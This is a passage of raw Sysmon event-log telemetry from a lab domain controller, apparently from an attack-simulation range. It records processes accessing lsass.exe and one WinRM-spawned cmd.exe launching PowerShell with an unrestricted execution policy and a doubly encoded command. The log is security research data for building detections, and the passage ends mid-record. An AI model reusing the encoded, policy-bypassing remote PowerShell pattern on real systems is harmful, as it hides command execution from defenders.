QQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x800000000000000078Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.826{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000077Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.826{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000076Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.826{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000075Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.826{D28789B6-7C3B-5FA1-F102-000000008701}15444764C:\Windows\system32\conhost.exe{D28789B6-7C3B-5FA1-F202-000000008701}4208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000074Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.826{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000073Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.826{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000072Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.826{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000071Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.826{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000070Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.826{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000069Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.826{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000068Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.826{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000067Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.826{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000066Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.810{D28789B6-7AC1-5FA1-0500-000000008701}6361160C:\Windows\system32\csrss.exe{D28789B6-7C3B-5FA1-F202-000000008701}4208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000065Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.810{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000064Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.810{D28789B6-7C3B-5FA1-F002-000000008701}8164160C:\Windows\system32\WinrsHost.exe{D28789B6-7C3B-5FA1-F202-000000008701}4208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b 154100x800000000000000063Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.819{D28789B6-7C3B-5FA1-F202-000000008701}4208C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C3B-5FA1-858E-100000000000}0x108e850HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C3B-5FA1-F002-000000008701}816C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x800000000000000062Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.810{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000061Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.810{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000060Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.810{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000059Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:19.810{D28789B6-7AD2-5FA1-1400-000000008701}13681992C:\Windows\system32\svchost.exe{D28789B6-7C3B-5FA1-F002-000000008701}816C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x800000000000000058Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 